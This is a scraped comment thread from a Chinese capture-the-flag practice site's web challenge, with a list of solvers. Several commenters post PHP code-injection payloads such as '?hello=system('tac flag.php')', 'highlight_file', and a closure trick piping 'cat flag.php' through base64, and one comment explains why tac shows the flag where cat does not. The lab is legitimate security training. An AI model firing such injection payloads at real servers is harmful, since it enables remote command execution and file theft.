评分(9)
解题动态

715252216 攻破了该题 18小时前

tt041013 攻破了该题 20小时前

1163064874 攻破了该题 1天前

llc123 攻破了该题 1天前

笨蛋奶妈 攻破了该题 2天前

theo1234 攻破了该题 2天前

frame 攻破了该题 3天前

flagshiwodie 攻破了该题 3天前

藕藕藕是木薯 攻破了该题 3天前

15180695821 攻破了该题 3天前

白凌 攻破了该题 3天前

11122222222 攻破了该题 3天前

ChinaYJ 攻破了该题 3天前

lucynull 攻破了该题 4天前

13353369950 攻破了该题 4天前

yy56 攻破了该题 4天前

15290408231 攻破了该题 4天前

1234ww 攻破了该题 4天前

我是web菜鸟 攻破了该题 4天前

评论
金智秀的老公 6天前
举报
金智秀的老公到此一游
Pixelw 9天前
举报
http://117.72.52.127:15551/?hello=system(%27tac%20flag.php%27)
Pixelw 9天前
举报
Too Young Too Simple
lfs451 10天前
举报
?hello=highlight_file(%27flag.php%27)
传奇吉他手千早爱音 10天前
举报
比F和弦简单
liuguowang75 1月前
举报
/?hello=system('ls') /?hello=system('cat flag.php')
HK1ng 1月前
举报
这里看了下面的评论,一直没搞懂为什么不用cat flag.php,然后我实验了一下,发现不直接显示内容,而是显示?>,但是如果右击查看源码就能发现flag的内容,而tac flag就能在页面直接看到flag,这是因为,当浏览器识别到<?php,就自动把它当作是未闭合的 PHP 标签,就会将其隐藏,而如果反转一下<?就识别不出来,就会当成是字符串输出。
Gargantua 1月前
举报
这是什么原因呢?是不是因为浏览器将php代码执行了啊
zhwen 1月前
举报
代码闭合并执行命令,GLOBALS); system('cat flag.php|base64'
650907784qqcom 1月前
举报
flag{***}
xinchang 1月前
举报
flag{*********}